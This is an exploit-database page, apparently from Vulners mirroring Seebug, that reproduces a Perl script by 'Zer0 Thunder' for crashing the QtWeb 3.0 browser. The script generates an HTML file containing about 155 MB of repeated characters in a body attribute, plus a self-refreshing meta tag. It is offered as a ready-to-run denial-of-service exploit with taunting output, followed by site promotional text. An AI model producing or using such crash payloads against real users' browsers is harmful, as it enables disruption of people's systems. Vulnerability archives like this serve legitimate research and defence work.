Lucene search
K

QtWeb 3.0 - Remote DoS/Crash Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

QtWeb 3.0 Remote DoS/Crash Exploit by Zer0 Thunder. Generates a large HTML file that crashes the QtWeb 3.0 browser

Code

                                                #!/usr/bin/perl
# File Name :QtWeb Web Browser 
# Vuln : Remote Dos/Crash
# Auther : Zer0 Thunder
# Msn : [email protected]
#
# Look at the task manager after u run this 
##==------>> 
#
# Exploit Title: QtWeb 3.0 Remote DoS/Crash Exploit 
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site  : http://www.qtweb.net/
# Software Link: http://qtweb.googlecode.com/files/QtWeb-3.0.zip
# Version: v 3.0
# Tested on: Windows XP Sp2 / .html was uploaded into a Ubuntu Server
#			 Also tested locally
#
##==------>> 
$file="zero_qbrwoser.html";
print " ======================================\n";
print " = QtWeb 3.0 Remote DoS/Crash Exploit =\n";
print " =                                    =\n";
print " ======================================\n"; 
print "\n";
print " Please Wait till c0de generate...\n";
my $buffer="\x41" x 100000000; #Buffer 
my $buffer_1="\42" x 55900000;
my $tit="\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; # lol on this
open(myfile,">>$file"); # b00m on here
print myfile "<html>";
print myfile "<title> y0u just got owned by $tit </title>";
print myfile '<head><meta http-equiv="refresh" content="1; url=zero_qbrwoser.html"></head>';
print myfile "<body alink=";
print myfile $buffer,$buffer_1;
print myfile '">';
print myfile "</html>";
close(myfile);
print "\n";
print " File Name : $file\n";
print " File Created Succesfully \n";
print "\n";
print "----------------------------------------------------------------------\n";
print " Founder : $tit\n";
print " For more information ==- msn : zer0_thunder[at]colombohackers[dot]com\n";
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
17